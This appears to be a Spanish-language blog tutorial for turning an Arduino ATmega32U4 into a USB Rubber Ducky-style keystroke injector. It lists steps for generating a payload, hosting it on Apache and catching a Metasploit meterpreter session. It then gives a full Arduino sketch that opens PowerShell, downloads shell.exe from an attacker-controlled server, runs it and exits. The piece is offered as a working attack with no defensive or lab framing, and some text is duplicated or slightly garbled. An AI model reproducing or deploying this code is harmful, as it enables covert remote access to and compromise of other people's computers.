RUBER DUKY
Para abordar este tema debemos
comprender que es una ruberduky ya que
este proyecto es basado en este una USB Rubber Ducky (o USB
Patito de Goma), es un hardware creado por Hak5, el cual, simula ser un pendrive normal, pero en
realidad es una herramienta que inyecta pulsaciones de teclas (es un teclado
camuflado). Al momento de conectar este USB, es reconocido con un driver
Atmel, haciéndose pasar por un teclado normal (para no levantar sospechas y
evitar que sea bloqueado por antivirus o firewall) y ejecuta las teclas
indicadas en su código.
Figura 1. Arduino ATMEGA 34U4
Para poder
realizar este proyecto se utilizó un dispositivo Arduino ATMEGA 34U4 que
contiene el chip Atmel por lo cual se podrá hacer la ejecución y simulación del
teclado y se poder así realizar la penetración al computador y hacer el debido
hackeo.
PASOS:
1) En nuestro
sistema operativo Kali Linux se llevarán a cabo los siguientes procesos
1- Buscar la
dirección física de red la cual será añadida en nuestro archivo.
2- Crearemos el
archivo con una aplicación llamada Ezesploit.
3- Ubicaremos
nuestro archivo creado en una carpeta que corresponde a nuestro servidor
apache.
4- Encenderemos
nuestro servidor apache.
5- pondremos a
nuestro pc en modo escucha para que cuando el dispositivo USB se conecte
podremos estar dentro del pc utilizaremos el programa Metasploit para realizar
está acción.
6- Descargamos
la aplicación Arduino ya que desde allí se realizará la programación
correspondiente para llevar a cabo el ataque.
7- Conectamos
nuestro Arduino y procedemos a programar las acciones correspondientes que
ejecutara luego en un powershell, con la librería keyboard ya que este simulara
un teclado.
8- La
programación tendrá la parte de la dirección de donde se descargar el archivo
que nos permitirá acceder al pc y también donde se guardad y luego lo ejecutará
automáticamente ya que esa fie la orden que le dimos anteriormente en la
programación Arduino.
Cuando ya se a efectuado la ejecución del archivo nos daremos cuenta que aquí nos inició la sesión meterpreter indicando que fue un éxito el hakeo.
código:
Cuando ya se a efectuado la ejecución del archivo nos daremos cuenta que aquí nos inició la sesión meterpreter indicando que fue un éxito el hakeo.
código:
#include <Keyboard.h>
void setup() {
Keyboard.begin();
delay(500);
Ejecutar();
Tipear("powershell");
Enter();
delay(500);
Tipear("$client = new-object System.Net.WebClient$client");
Enter();
delay(500);
Tipear("$client.DownloadFile(\'http://192.168.1.10/shell.exe','Desktop/shell.exe')");
Enter();
delay(500);
Tipear("Invoke-item $Env:userprofile/Desktop/shell.exe");
Enter();
delay(100);
Tipear("Exit");
Enter();
Keyboard.end();
digitalWrite(LED_BUILTIN, LOW);
}
void loop() {
}
void Enter(){
Keyboard.press(KEY_RETURN);
delay(500);
Keyboard.release(KEY_RETURN);
delay(500);
}
void Cerrar(){
Keyboard.press(KEY_LEFT_ALT);
Keyboard.press(KEY_F4);
delay(500);
Keyboard.release(KEY_LEFT_ALT);
Keyboard.release(KEY_F4);
delay(500);
}
void Tipear(char txt[]){
Keyboard.print(txt);
delay(500);
}
void Ejecutar(){
Keyboard.press(KEY_LEFT_GUI);
Keyboard.press('r');
delay(500);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
delay(500);
}
VÍDEO TUTORIAL









0 comentarios: